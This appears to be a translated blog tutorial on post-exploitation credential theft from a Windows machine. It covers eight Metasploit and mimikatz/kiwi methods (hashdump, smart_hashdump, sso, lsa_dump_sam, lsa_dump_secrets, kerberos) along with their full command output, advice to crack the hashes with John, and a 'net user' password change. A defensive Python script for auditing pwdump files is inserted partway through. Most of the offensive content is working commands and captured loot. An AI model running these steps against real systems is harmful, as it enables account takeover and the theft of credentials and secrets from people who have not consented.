Several ways to obtain Windows password hashes

Passwords extracted using the Metasploit framework


Method 1: hashdump

Running the command below retrieves the stored password hashes of every Windows user on the system (one line per account, in the form user:RID:LM hash:NTLM hash:::).

meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
meterpreter >

Once you have the hashes you can crack them with John plus a wordlist, or submit them to an online hash-cracking site.
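Before cracking anything it is worth auditing the dump itself, because the pwdump-style lines the modules above emit already reveal several things: whether an LM hash is still stored (the sentinel aad3b435b51404eeaad3b435b51404ee means "no LM hash"), whether an account has an empty password (NT hash 31d6cfe0d16ae931b73c59d7e0c089c0), and whether two accounts share a password (identical NT hash, as Administrator and test do here). The script below is an added example, not code from the post or from Metasploit; the parser, function names and findings layout are mine, the two sentinel constants are the well-known empty-LM and empty-NT values, and the sample input reuses the three hash lines shown in the post's output.

```python
"""Audit a pwdump-format hash dump (user:RID:LM:NT:::) for weak-credential findings.

Added example for this post; not part of the original article or of Metasploit.
"""
import re
from collections import defaultdict

# Well-known sentinel values: the LM field when no LM hash is stored, and the
# NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample input: the same three accounts the post's hashdump output shows.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
"""

# One pwdump line: user, numeric RID, 32 hex chars LM, 32 hex chars NT, then ":::".
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)


def parse_pwdump(text):
    """Return a list of {user, rid, lm, nt} dicts.

    Lines that are not in pwdump format (status messages, password hints such as
    test:"test") are skipped, and the "[+] " prefix smart_hashdump adds is removed.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[+] "):
            line = line[4:]
        m = LINE_RE.match(line)
        if not m:
            continue
        entries.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return entries


def audit(entries):
    """Flag stored LM hashes, empty passwords and NT hashes shared by several accounts."""
    findings = {"lm_present": [], "empty_password": [], "shared_password": []}
    by_nt = defaultdict(list)
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings["lm_present"].append(e["user"])
        if e["nt"] == EMPTY_NT:
            findings["empty_password"].append(e["user"])
        else:
            by_nt[e["nt"]].append(e["user"])
    # Accounts with the same NT hash have the same password.
    for users in by_nt.values():
        if len(users) > 1:
            findings["shared_password"].append(sorted(users))
    findings["shared_password"].sort()
    return findings


if __name__ == "__main__":
    for key, value in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

On the sample the script reports no LM hashes, Guest with an empty password, and Administrator and test sharing one password, which is exactly what the SSO module output later in the post confirms in plaintext (both use test123). On a real audit, shared hashes between a local Administrator and other accounts are the first thing to fix, since one cracked password then opens every account in the group.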

Method 2: run post/windows/gather/hashdump

This module reads the local user accounts from the SAM database via the registry. The difference from the previous one is the extra test:"test" line: it also dumps the password hints.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 73a2a371e4c81f43ef47d86b3bf5d27b...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

test:"test"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::

Method 3: run post/windows/gather/smart_hashdump

Much the same as the previous one.

meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against TEST-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20180208054244_default_192.168.137.128_windows.hashes_811529.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 73a2a371e4c81f43ef47d86b3bf5d27b...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] test:"test"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
[+] test:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::

Method 4: run post/windows/gather/credentials/credential_collector

This one returns a bit more (it also collects tokens), emmmm.

meterpreter > run post/windows/gather/credentials/credential_collector

[*] Running module against TEST-PC
[+] Collecting hashes...
Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1
Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: test:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1
[+] Collecting tokens...
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
test-PC\Administrator
test-PC\test
NT AUTHORITY\ANONYMOUS LOGON

Method 5: run post/windows/gather/credentials/sso

This one is rather better: it shows the plaintext password directly.

meterpreter > run post/windows/gather/credentials/sso 

[*] Running module against TEST-PC
Windows SSO Credentials
=======================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;145220 NTLM test-PC Administrator test123
0;23330968 NTLM test-PC Administrator test123
0;24520612 Negotiate test-PC Administrator
0;24619626 Negotiate test-PC Administrator
0;24717059 Negotiate NT AUTHORITY SYSTEM
0;24986730 Negotiate NT AUTHORITY SYSTEM
0;25063663 Negotiate test-PC Administrator
0;3565115 NTLM test-PC test test123
0;3565139 NTLM test-PC test test123

meterpreter >

Method 6: load kiwi

meterpreter > load kiwi
Loading extension kiwi...

.#####. mimikatz 2.1.1 20170608 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */

Success.

Let's first look at Kiwi's help.

Kiwi Commands
=============

Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)

You can try them all yourself, but some of the functions cannot be used under SYSTEM privileges, which is perverse; you have to drop privileges first.

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : TEST-PC
SysKey : 73a2a371e4c81f43ef47d86b3bf5d27b
Local SID : S-1-5-21-553051396-1028234690-3130437969

SAMKey : ef5996069dea28d34bd17473b9f86386

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : c5a237b7e9d8e708d8436b6148a25fa1

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000003e8 (1000)
User : test
LM :
NTLM : c5a237b7e9d8e708d8436b6148a25fa1

meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : TEST-PC
SysKey : 73a2a371e4c81f43ef47d86b3bf5d27b

Local name : test-PC ( S-1-5-21-553051396-1028234690-3130437969 )
Domain name : WORKGROUP

Policy subsystem is : 1.11
LSA Key(s) : 1, default {134f8789-8d77-b8a1-d7cd-d1a7758f90dd}
[00] {134f8789-8d77-b8a1-d7cd-d1a7758f90dd} 184b95d332248097138abc2d5a393b0a9f1f8df3fccaf9db9b33b46d0167a8a4

Secret : DefaultPassword
old/text: test123

Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 32 52 75 7c 26 4e 12 a4 cb e1 ce 08 0c fa 8d 34 25 47 cb 95 fc d3 b8 60 34 9d 89 8c 0c e1 29 82 a5 bd ce 19 63 bf bf a2
full: 3252757c264e12a4cbe1ce080cfa8d342547cb95fcd3b860349d898c0ce12982a5bdce1963bfbfa2
m/u : 3252757c264e12a4cbe1ce080cfa8d342547cb95 / fcd3b860349d898c0ce12982a5bdce1963bfbfa2
old/hex : 01 00 00 00 bb 25 c5 89 14 75 57 dd e8 27 78 60 84 26 9e 8f f9 51 6c 86 f6 2d 06 1a 88 97 d6 cb 2d 1c 38 19 0b c3 c9 01 88 d3 6f a2
full: bb25c589147557dde827786084269e8ff9516c86f62d061a8897d6cb2d1c38190bc3c90188d36fa2
m/u : bb25c589147557dde827786084269e8ff9516c86 / f62d061a8897d6cb2d1c38190bc3c90188d36fa2

Secret : NL$KM
cur/hex : b0 03 03 0b 04 67 9a 3e 30 ee a0 d6 e1 72 78 80 07 27 6c 00 4a bd 3d b5 22 cb bf a1 18 04 51 3f af 64 44 c0 b6 46 bf df 62 f7 84 eb 02 6c 66 d9 df ee aa 52 49 ae 6e 05 55 8b 38 f9 10 7d 48 23

meterpreter >

Method 7: run post/windows/gather/phish_windows_credentials

This one works by invoking PowerShell, and some servers have PowerShell disabled, emmmm; I'll fill this in once I find a box that isn't locked down.
There is also run powerdump, which works as well.

Method 8: load mimikatz

This is also one I use often.

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;25063663 Negotiate test-PC Administrator
0;24986730 Negotiate NT AUTHORITY SYSTEM
0;24717059 Negotiate NT AUTHORITY SYSTEM
0;24619626 Negotiate test-PC Administrator
0;24520612 Negotiate test-PC Administrator
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP TEST-PC$
0;22190 NTLM
0;999 NTLM WORKGROUP TEST-PC$
0;23330968 NTLM test-PC Administrator test123
0;3565139 NTLM test-PC test test123
0;3565115 NTLM test-PC test test123
0;145220 NTLM test-PC Administrator test123

meterpreter >

Changing the password


Method 1

The more cumbersome way: post/windows/manage/change_password.
Run show options and look at the options yourself.

Method 2

How do you change it on Windows itself? Drop into a shell and run net user XXX XXX.

Reference: 倾旋's blog - Post-exploitation against a major domestic vendor - continued
Four commonly used methods are enough; the others are only needed when those don't work.